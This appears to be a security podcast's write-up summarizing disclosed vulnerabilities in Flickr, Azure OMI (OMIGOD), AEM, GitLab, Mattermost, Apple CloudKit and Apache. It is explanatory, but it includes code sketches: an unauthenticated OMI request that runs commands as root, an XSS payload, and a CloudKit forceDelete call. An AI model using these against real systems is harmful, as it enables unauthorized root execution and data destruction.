A Flickr CSRF, GitLab, & OMIGOD, Azure again?
When SmugMug bought Flickr from Yahoo, they had to migrate away from Yahoo’s authentication system. A side-effect of this was that the account deletion process had previously used the Yahoo authentication code as its CSRF token, so in the move the token was removed and never replaced with anything functionally equivalent.
I’d imagine this happened because the developer saw the Yahoo Auth Token purely as something associated with Yahoo’s authentication, and not as serving double duty to prevent CSRF. It’s a good reminder not to be clever about reusing pieces of information, because later development can pretty easily make mistakes like this.
There are four vulnerabilities in Azure’s Open Management Infrastructure (OMI): one allows an unauthenticated attacker on the internet to execute code as root, and the other three allow local users of any privilege level to execute code as root.
Unauthenticated Root RCE (CVE-2021-38647)
This one does require that the OMI management port be exposed, which mitigates the risk for most, but not all, services that use OMI; it is exposed by default by Configuration Manager and System Center Operations Manager. As far as vulnerabilities go it is simple: by not providing the
Authorization header, the authorization code is never run, resulting in the
uid/gid never being initialized to non-zero values. Zero being the uid/gid of the
root user on most Linux systems.
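The shape of that request can be sketched as follows. This is a minimal illustration based on public write-ups of CVE-2021-38647; the SOAP envelope details and header names here are assumptions, not verified against a live OMI install. The key point is what is absent: the Authorization header.

```python
# Sketch of an OMIGOD-style WS-Man ExecuteShellCommand request. The
# envelope structure is an assumption from public write-ups; the bug is
# simply that the Authorization header is omitted entirely.

def build_omigod_request(command: str) -> tuple[dict, str]:
    """Return (headers, body) for an unauthenticated OMI exec request."""
    body = f"""<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope"
    xmlns:p="http://schemas.microsoft.com/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
  <s:Body>
    <p:ExecuteShellCommand_INPUT>
      <p:command>{command}</p:command>
      <p:timeout>0</p:timeout>
    </p:ExecuteShellCommand_INPUT>
  </s:Body>
</s:Envelope>"""
    headers = {
        "Content-Type": "application/soap+xml;charset=UTF-8",
        # Crucially, no "Authorization" header: the auth code never runs,
        # so uid/gid stay zeroed and the command executes as root.
    }
    return headers, body
```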
Local Privilege Escalation (CVE-2021-38648)
Somewhat similar to the prior issue, however this one takes place in the
omicli application, which is used to communicate with
omiengine (which processes requests when necessary, and passes them along to the
omiserver running as root). By capturing a legitimate command execution request from
omicli and removing the authentication portion,
omiengine will pass the request along to
omiserver with zeroed uid/gid values, which
omiserver has no choice but to trust.
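The underlying trust failure can be illustrated with a toy parser (this is not the real OMI wire format, just the bug pattern): when the auth block is stripped, the server-side defaults are zero, and zero means root.

```python
# Illustration (not the real OMI protocol) of why stripping the auth
# block works: missing credential fields default to 0, and nothing
# downstream rejects a request whose credentials were never filled in.

def parse_request(msg: dict) -> dict:
    creds = msg.get("auth", {})      # attacker simply omits this key
    return {
        "command": msg["command"],
        "uid": creds.get("uid", 0),  # zero-value default == root
        "gid": creds.get("gid", 0),
    }
```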
Local Privilege Escalation (CVE-2021-38645)
Unlike the prior two, this one is actually a bit of a race condition combined with improperly trusting incoming messages from users as if they were server messages. The authentication process is that
omicli sends credentials to
omiengine, which sends them to
omiserver to be validated.
omiserver then sends a response back.
An attacker can attempt to race that response by sending a spoofed success message to
omiengine before
omiserver replies. This does require knowing the connection number for the
omicli connection, as it is included in the response from
omiserver; however, according to the author this is usually a number less than 10, and I imagine it is an incremental number, so it should be fairly predictable, and you can try multiple times.
A WAF bypass by confusing the Adobe Experience Manager Dispatcher (load balancer/WAF/etc.). Not a crazy idea, but I don’t think we’ve covered any WAF bypass quite like this on the podcast before. The goal was to access
/bin/querybuilder.json (I’m not sure if the
.json was part of the endpoint or part of confusing the Dispatcher), which would lead to access to the host filesystem. This was done by fuzzing the endpoint with various allowed features and parameters until the Dispatcher sent the query through, resulting in a final path along the lines of
For a GitLab bug, this one is nice and simple: stored XSS in the “default branch name” field. For a group, you can set up what the group’s default branch name should be for any new repositories created. Then, when creating a new repository, GitLab provides code to be executed that will initialize your repository, and this code reflects the default branch name without any sanitization to whoever is viewing the page.
It’s a bit surprising this XSS wasn’t discovered sooner because it is rather straightforward, though in fairness I do believe this feature is relatively new (maybe a year old?) and it is a bit of an unseen location.
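The bug class can be sketched in a few lines. The snippet text here is hypothetical (I haven’t reproduced GitLab’s exact template), but it shows the difference a single escaping call makes when user-controlled text is interpolated into a rendered page:

```python
import html

# Hypothetical rendering of a "push an existing repo" snippet: a group
# default branch name carrying markup becomes stored XSS when it is
# interpolated into the page unescaped.

branch = '<img src=x onerror=alert(document.domain)>'

vulnerable = f"git push -u origin {branch}"          # reflected as-is
fixed = f"git push -u origin {html.escape(branch)}"  # entities, inert in HTML
```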
This Mattermost bug is effectively a replay attack: join a channel you can comment in, post a comment, and capture that POST request. Then switch to a channel you cannot comment in (but can join) and send that captured POST request. It’s interesting that permissions were (apparently) not being checked at the time of sending on the server. Also, since no modification of that captured request was necessary, Mattermost must be tracking state like which channel is being viewed on the server side rather than including it with the request, which makes me suspicious that there are other state-tracking issues in the application for future bug hunters to find.
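The replay can be sketched as follows. The endpoint and field names below are illustrative only (the write-up doesn’t give the exact request, and Mattermost’s current API may differ); the point is that the captured request carries no channel identifier, so the server must be resolving the target channel from its own session state.

```python
# Sketch of the replay attack. URL and JSON fields are placeholders;
# note the captured body names no channel, which is what makes the
# unmodified replay land in whatever channel the session last viewed.

captured = {
    "url": "https://mattermost.example/api/v4/posts",
    "headers": {"Authorization": "Bearer <session token>"},
    "json": {"message": "hello"},   # no channel_id: server-side state
}

def replay(req: dict) -> dict:
    """Re-send the captured request byte-for-byte (no edits needed)."""
    return {k: req[k] for k in ("url", "headers", "json")}
```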
Three bugs relating to insecurely configured CloudKit containers, the big one being the accidental deletion of all Apple Shortcuts, but also the ability to delete records on Apple News, and modify data used on the iCrowd+ website.
CloudKit Primer - For the uninitiated, CloudKit is a data storage framework from Apple that takes an app’s data and stores it in the cloud. Application developers can create a container; containers have environments with three scopes (Private, Shared, and Public), Public being accessible by anyone with a public API token. Each scope has zones, the default zone being
_defaultZone, and finally, each zone has Records with Fields, which have types and are where the data is actually stored.
The author also found that there are at least three different APIs that communicate with CloudKit in different ways. This becomes important, as at points he switches between the API the application uses and one that is easier to communicate with.
Apple News - This took a bit more effort to figure out because Apple News used the Protobuf API. Ultimately, by using the API that Apple Notes uses (and changing the container), he was able to see that all News articles and stock information were in the public scope. While most of the methods were not allowed, one method,
forceDelete, was, granting the ability to delete any News article or stock.
Apple Shortcuts - This one caused some drama, as the testing became destructive, deleting all shared Apple Shortcuts. Essentially, shared shortcuts would be moved into the Public environment in the
_defaultZone. The problem was that a public user could delete the records in that zone.
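A record-deletion call of this general shape can be sketched against CloudKit’s web services API. The container name, record name, and token below are placeholders, and I’m assuming the web-facing `records/modify` endpoint here rather than whichever of the three APIs the author actually used:

```python
import json

# Sketch of a CloudKit Web Services "modify records" request of the kind
# abused here. Container/record/token are placeholders; a public scope
# plus an exposed API token is what made forceDelete reachable at all.

CONTAINER = "iCloud.example.container"   # placeholder, not the real one
TOKEN = "<public ckAPIToken>"            # placeholder

url = (f"https://api.apple-cloudkit.com/database/1/{CONTAINER}"
       f"/Production/public/records/modify?ckAPIToken={TOKEN}")

payload = json.dumps({
    "operations": [{
        "operationType": "forceDelete",  # the one method left enabled
        "record": {"recordName": "example-record"},
    }],
    "zoneID": {"zoneName": "_defaultZone"},
})
```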
A rather non-intuitive bug where sending an invalid
Content-Length: x header would result in source disclosure on Apache.
The root of the bug is rather non-intuitive and has its origins in ignoring errors from filters. Naturally, one of the HTTP filters does see the invalid
Content-Length header and makes a call to
bail_out_on_error to write out the error message and bail. Rather than properly bailing, however, the function that triggers the filter chain gets the
AP_FILTER_ERROR return code and has a switch statement on it, which just happens to completely ignore the
AP_FILTER_ERROR case, allowing the bad request to continue being processed.
Ultimately this invokes a “txt/HTML” generator on the PHP file, resulting in the PHP source code being written as output rather than the file being executed by the PHP interpreter. It’s not entirely clear from the write-up why “txt/HTML”, but my educated guess would be that a later filter in the chain that would normally change the generator and type simply wasn’t executed due to the early error return.
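The bug pattern translates cleanly out of C. This is a Python analogy, not httpd’s actual code: a filter bails with an error code, but the dispatching switch has no case for that code, so processing simply falls through and continues.

```python
# Python analogy of the Apache filter-chain bug (the real code is C in
# httpd): a filter returns AP_FILTER_ERROR, the caller's "switch" only
# handles the codes it expects, and the bad request keeps flowing.

AP_FILTER_ERROR = -102  # httpd's sentinel for filter errors

def check_content_length(headers: dict) -> int:
    """The filter: bail with AP_FILTER_ERROR on a non-numeric length."""
    try:
        int(headers.get("Content-Length", "0"))
        return 0
    except ValueError:
        return AP_FILTER_ERROR

def run_filters(headers: dict) -> str:
    rc = check_content_length(headers)
    if rc in (403, 413):           # the cases the "switch" handles
        return "request rejected"
    # AP_FILTER_ERROR falls through here unhandled -- the bug
    return "request processed"
```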
While this bug was silently patched, the security implications were not recognized, and so the fix had not (at the time of the presentation) been backported.